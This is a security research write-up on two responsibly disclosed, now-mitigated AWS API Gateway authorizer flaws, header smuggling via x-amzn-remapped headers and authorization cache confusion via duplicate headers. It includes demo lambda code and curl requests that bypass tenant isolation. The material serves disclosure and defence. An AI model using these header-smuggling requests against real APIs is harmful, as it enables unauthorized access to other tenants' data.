Writeup: AWS API Gateway header smuggling and cache confusion

19 September 2023

In this blog, we’ll dive deeply into two potential security issues that Omegapoint identified in AWS API Gateway authorizers. We reported these issues to AWS in November 2022 and January 2023.

AWS rolled out mitigations to all AWS customer accounts in May 2023.

Throughout the process, we’ve been in close contact with representatives from AWS to coordinate a responsible disclosure of these issues. Special thanks to Dan, Ryan, and Alexis with AWS Security for keeping us updated!

AWS has published their own blog on this topic which can be found here https://aws.amazon.com/blogs/security/removing-header-remapping-from-amazon-api-gateway-and-notes-about-our-work-with-security-researchers/.

What is a lambda authorizer?

Before we get to the security issues, some context setting is in order. If you already understand how API Gateway lambda authorizers work, feel free to skip to the next section.

A Lambda authorizer is an API Gateway feature to handle access control through a lambda function. Each request towards your API is forwarded to a lambda function which returns an authorization policy based on the caller’s identity, see diagram below.

Lambda authorizers come in two flavors:

The potential security issues discussed in this blog relate only to request-based authorizers.

Authorization policies returned by the authorizer can be cached at the API Gateway. Subsequent requests towards the same endpoint with the same identification sources (either token or request based) within the cache TTL re-use previous cache policies.

With this short introduction out of the way, let’s go to the first issue!

Header smuggling using header rewrite feature

We identified this issue during a penetration test of a customer system running on AWS. This allowed us to completely bypass the application’s tenant isolation and access data from any tenant in the system. The issue was identified and reported to AWS Security in November 2022.

In an application fronted by an API Gateway with a lambda authorizer, we found a feature that makes it possible to rewrite headers between the lambda authorizer and the service.

Request headers with the prefix x-amzn-remapped can be used to overwrite HTTP header values after the request has been processed by the authorizer lambda.

Any header beginning with x-amzn-remapped is sent verbatim to the authorizer lambda but is rewritten without the prefix when passed to the application.

It will overwrite any existing headers with the same name in the original request. For example, x-amzn-remapped-foo will overwrite the header foo causing the authorizer and the application to see different request headers, as illustrated below.

This is presumably a feature intended for supporting customer’s legacy systems whose header-handling logic can’t be modified, but the public documentation of it is incomplete. The inverted behavior can be observed for responses, where the Server header returned by a service is remapped to the x-amzn-remapped-server header by AWS API Gateway. See https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-known-issues.html for more information.

In the above example, the authorizer and service receive different values for the header foo.

The application in which we initially identified the issue could be “tricked” into making access control decisions in the authorizer base on one header value, and manipulate data in the service based on another value using the x-amzn-remapped feature.

Example scenario

To illustrate the issue, consider the following example. We have an API with one endpoint GET /request realized by a lambda function with an API Gateway in front. An authorizer lambda handles authentication and authorization.

Requests are authorized by the value of the HTTP header x-api-key. Each API key has access to a specific tenant which is specified using the HTTP header x-tenant.

The lambda authorizer myAuthorizer is implemented as follows (in a more realistic scenario, API keys and tenant configuration would not be hard-coded).

// allows or denies requests based on the supplied
// x-api-key and x-tenant header combination
export const handler =  function(event, context, callback) {
    const tenant = event.headers['x-tenant'];
    const apiKey = event.headers['x-api-key'];
    console.log(tenant, apiKey);
    const allowOrDeny = verifyApiKeyForTenant(apiKey, tenant);
    
    const authResponse = {
        policyDocument: {
            Version: '2012-10-17',
            Statement: [{
                Action: 'execute-api:Invoke',
                Effect: allowOrDeny,
                Resource: event.methodArn
            }]
        },
        context: {}
    };
    callback(null, authResponse);
};

function verifyApiKeyForTenant(apiKey, tenant) {
    // mocked for brevity
    switch (tenant) {
        case 'tenantA': 
            return apiKey == 'secret1234' ? 'Allow' : 'Deny';
        case 'tenantB':
            return apiKey == 'other6789' ? 'Allow' : 'Deny';
        default:
            return 'Deny';
    }
}

The authorizer will allow the following combinations of API key and tenant and deny all other values.

x-api-key x-tenant
secret1234 tenantA
other6789 tenantB

The lambda myFunction, which includes the “core business logic”, is implemented as follows:

// authorization is already handled by authorizer lambda which
// verifies that the correct api key is used for the correct tenant header
export const handler = async(event, context, callback) => {
        
    const tenant = event.headers['x-tenant'];
    const responseData = getCustomerData(tenant);
    const response = {
        isBase64Encoded: false,
        statusCode: 200, headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(responseData)
    };
    callback(null, response);
};


function getCustomerData(tenant) {
    // mocked instead of using a db
    switch(tenant) {
        case 'tenantA':
            return {data: 'data for tenant A'};
        case 'tenantB':
            return {data: 'data for tenant B'};
        default:
            throw Error('unknown tenant');
    }
}

The lambda function returns customer data based on the supplied HTTP header x-tenant. The code snippet below shows the happy case were the correct API key and tenant is supplied.

$ curl -s --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
    -H 'x-api-key: secret1234' \
    -H 'x-tenant: tenantA'

{
  "data": "data for tenant A"
}

Attempts to reach other tenants’ data are blocked by the lambda authorizer, as expected.

$ curl -s --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
    -H 'x-api-key: secret1234' \
    -H 'x-tenant: tenantB'

{
  "Message": "User is not authorized to access this resource with an explicit deny"
}

In our example application, an attacker with access to a tenant can use the identified security issue to access data belonging to another tenant. This is done by first constructing a “happy-case” request with the correct tenant and API key and then adding an x-amzn-remapped-x-tenant: tenantB header to the request.

The lambda authorizer sees the two headers x-tenant: tenantA and x-amzn-remapped-x-tenant: tenantB. When the request arrives at the service the second header has overwritten the first and x-tenant: tenantB is used for accessing data.

$ curl -s --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
    -H 'x-api-key: secret1234' \
    -H 'x-tenant: tenantA' \
    -H 'x-amzn-remapped-x-tenant: tenantB'

{
  "data": "data for tenant B"
}

This shows that we can read data from tenant B using the API key of tenant A.

Below is a recorded demo of the example.

Not all headers are the same

A small number of headers are not possible to smuggle using this method. Out of more than 100 tested HTTP headers the following have been identified as not possible to rewrite.

One could imagine the possibilities of being able to overwrite headers like content-length or host, but fortunately they are treated differently.

Cache confusion of authorization policies

This is the second security issue covered by this writeup. We first noticed this issue during a penetration test of a customer system in January 2023. While this system was also vulnerable to the previous finding, we found a second potential security issue caused by improper handling of cache keys in the authorizer policy cache of API Gateway. This again allowed us to completely bypass tenant isolation in the affected system.

Authorization policies returned by an AWS API Gateway authorizer lambda are cached (if cache is enabled) using the supplied identification source as cache key. In some cases, we found that it’s possible to re-use a cached authorization policy with modified identification sources. This effectively allows us to bypass the authorization lambda.

The issue is based on how multiple occurrences of the same HTTP header in a single request is treated when performing the cache lookup. We found that for requests specifying multiple HTTP headers with the same name, API Gateway will always use the last occurrence of the header as a cache key.

For example, if the identification source is the HTTP header Cookie, a user can create a cached authorization policy by first making a request with a valid Cookie header value.

If the user makes a new request, within the TTL of the cache, with an additional Cookie header it’s possible to re-use the cached policy. When a cached authorization policy is used, the authorizer is not invoked.

To re-use the previous authorization policy, the “new” header must be specified before the original header. This also works when multiple identity sources are specified.

During our research we found that the authorization HTTP header is treated differently, and requests with multiple occurrences of the header are automatically rejected by AWS API Gateway.

Example

Below are proof of concept implementations of an authorizer lambda and API function to showcase this behavior. The service lambda is placed behind an API Gateway with an authorizer. The authorizer is configured to cache authorization policies, with a TTL of 300 seconds. The configured identity sources are the two HTTP headers authorization and x-tenant.

The authorizer is implemented to allow any requests where the HTTP headers authorization and x-tenant are equal. Requests with multiple authorization or x-tenant headers should be rejected immediately. When an authorization policy is created, information about the identification sources and a timestamp of when the policy was created are added to the request context.

export const handler =  function(event, context, callback) {
    const tokens = event.multiValueHeaders['authorization'];
    const tenants = event.multiValueHeaders['x-tenant'];

    if (!(tokens.length === 1 && tenants.length === 1)) {
        throw Error("only one token and tenant can be supplied")
    }
    const token = tokens[0];
    const tenant = tenants[0];

    const isTokenValid = validateToken(token);
    const tokenHasTenantClaim = validateTokenTenantClaim(token, tenant);
    const allowOrDeny = (isTokenValid && tokenHasTenantClaim) ? 'Allow' : 'Deny';
    const authResponse = {
        policyDocument: {
            Version: '2012-10-17',
            Statement: [{
                Action: 'execute-api:Invoke',
                Effect: allowOrDeny,
                Resource: event.methodArn
            }]
        },
        context: {
            authPolicyCreatedAt: new Date().toISOString(),
            authPolicyCreatedForTenant: tenant,
            authPolicyCreatedForToken: token
        }
    };
    callback(null, authResponse);
    return;
};

function validateToken(token) {
    // example: all tokens are valid
    return true;
}

function validateTokenTenantClaim(token, tenant) {
    // example: in a real scenario we would for example use a JWT and check claims.
    return token === tenant;
}

The service lambda returns the identification sources, as seen by the service, and the context parameters added by the authorizer lambda.

export const handler = async(event, context, callback) => {
  const responseData = {
        tenants: event.multiValueHeaders['x-tenant'],
        tokens: event.multiValueHeaders['Authorization'],
        authorizerContext: {
            authPolicyCreatedForTenant: event.requestContext.authorizer.authPolicyCreatedForTenant,
            authPolicyCreatedForToken: event.requestContext.authorizer.authPolicyCreatedForToken,
            authPolicyCreatedAt: event.requestContext.authorizer.authPolicyCreatedAt
        }
    };

    const response = {
        isBase64Encoded: false,
        statusCode: 200,
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(responseData)
    };

    callback(null, response);
};

With this setup, we issue a request with matching tenant and authorization information to demo the happy case.

curl --http1.1 -s \
  --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
  -H "authorization: tenantA" \
  -H "x-tenant: tenantA" | jq
{
  "tenants": [
    "tenantA"
  ],
  "tokens": [
    "tenantA"
  ],
  "authorizerContext": {
    "authPolicyCreatedForTenant": "tenantA",
    "authPolicyCreatedForToken": "tenantA",
    "authPolicyCreatedAt": "2023-01-24T12:25:42.289Z"
  }
}

This works as expected and we see that both the authorizer and service were called with the same authorization and x-tenant information. We also note the timestamp of the authorization policy. We’ll come back to this timestamp later.

Changing the tenant value causes the request to be denied by the lambda authorizer.

curl --http1.1 -s \
  --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
  -H "authorization: tenantA" \
  -H "x-tenant: tenantB" | jq
{
  "Message": "User is not authorized to access this resource with an explicit deny"
}

At this point in time we have two cached authorization policies. One “allow policy” for tenantA/tenantA and one “deny policy” for tenantA/tenantB. By modifying the original happy-case request we can exploit the cache confusion issue by adding a second x-tenant header before the original.

curl --http1.1 -s \
  --url 'https://98gmbs3mpc.execute-api.eu-north-1.amazonaws.com/myStage/request' \
  -H "authorization: tenantA" \
  -H "x-tenant: tenantB" \
  -H "x-tenant: tenantA" | jq
{
  "tenants": [
    "tenantB",
    "tenantA"
  ],
  "tokens": [
    "tenantA"
  ],
  "authorizerContext": {
    "authPolicyCreatedForTenant": "tenantA",
    "authPolicyCreatedForToken": "tenantA",
    "authPolicyCreatedAt": "2023-01-24T12:25:42.289Z"
  }
}

By looking at the response we see that the service was called with both x-tenant values. The authorizer context however, shows the same information as the original happy-case flow — including the timestamp. This indicates that the authorizer was not invoked and that the previously cached authorization policy was re-used even though we added the second x-tenant header.

The recording below shows the described attack.

We identified this security issue during a penetration test of a customer system. In this case the service used the first occurrence of the x-tenant header for data access which allowed us to bypass the authorizer and access data across tenant boundaries.

How applications handle multiple occurrences of the same header is implementation specific. When using the AWS lambda SDK, developers can use event.headers to access the last value, or event.multiHeaders to retrieve a list of all values for a header. Other frameworks such as Java/Spring join multi-values to a single string separated with a comma. The Java web framework Micronaut always return the first occurrence when using the method getHeader.

The impact of this potential security issue depends on how the service handles duplicate headers. Even if the service correctly handles multiple headers, the issue still allows us to bypass the lambda authorizer with modified identification sources.

Summary

We identified both potential security issues during penetration tests of two separate systems. These systems had one thing in common: all authentication, authorization, and access control decisions were implemented in the gateway authorizer. The underlying applications did not perform any access control of themselves.

Relying solely on infrastructure-level protections such as a gateway or firewall increases the risk of a system. Security is best implemented in multiple layers according to the principles of defence in depth.

A system should also be able to “stand on its own” and be exposed to the internet even if infrastructure-level protection fails, according to Zero Trust recommendations.

If you’re interested in reading more about the concepts of defence in depth, please have a look at our seven part article series on the topic Defence in Depth.

Had the applications that we performed the tests on implemented proper defence in depth access control, we would not have been able to exploit the above security issues.

Timeline


Pontus Hanssen

Security Researcher

Kasper Karlsson

Security Researcher

Åke Axeland

Security Researcher


More in this series: